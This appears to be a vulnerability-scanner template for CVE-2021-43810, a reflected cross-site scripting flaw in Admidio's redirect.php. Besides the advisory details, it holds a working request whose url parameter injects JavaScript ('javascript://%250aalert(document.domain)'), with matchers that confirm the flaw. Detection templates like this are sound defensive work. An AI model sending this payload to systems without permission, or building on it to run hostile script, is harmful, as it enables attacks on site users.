id: CVE-2021-43810 info: name: Admidio - Cross-Site Scripting author: gy741 severity: medium description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts. remediation: Upgrade to version 4.0.12 or later. reference: - https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh - https://nvd.nist.gov/vuln/detail/CVE-2021-43810 - https://github.com/Admidio/admidio/commit/fcb0609abc1d2f65bc1377866bd678e5d891404b - https://github.com/Admidio/admidio/commit/c043267d362f7813543cc2785119bf3e3e54fe21 - https://github.com/Admidio/admidio/releases/tag/v4.0.12 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-43810 cwe-id: CWE-79 epss-score: 0.00513 epss-percentile: 0.7398 cpe: cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: admidio product: admidio tags: cve,cve2021,admidio,xss http: - method: GET path: - '{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)' matchers-condition: and matchers: - type: word part: body words: - 'please click ' - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 490a0046304402203947273b08dee2356f9db4b2b09eeb56130693c603b0956f675526d3cbac7f20022065099ab5e3889da74a0067e6866b9565ee34fe1a1e88bd16ef5df1fe55d9f28a:922c64590222798bb761d5b6d8e72950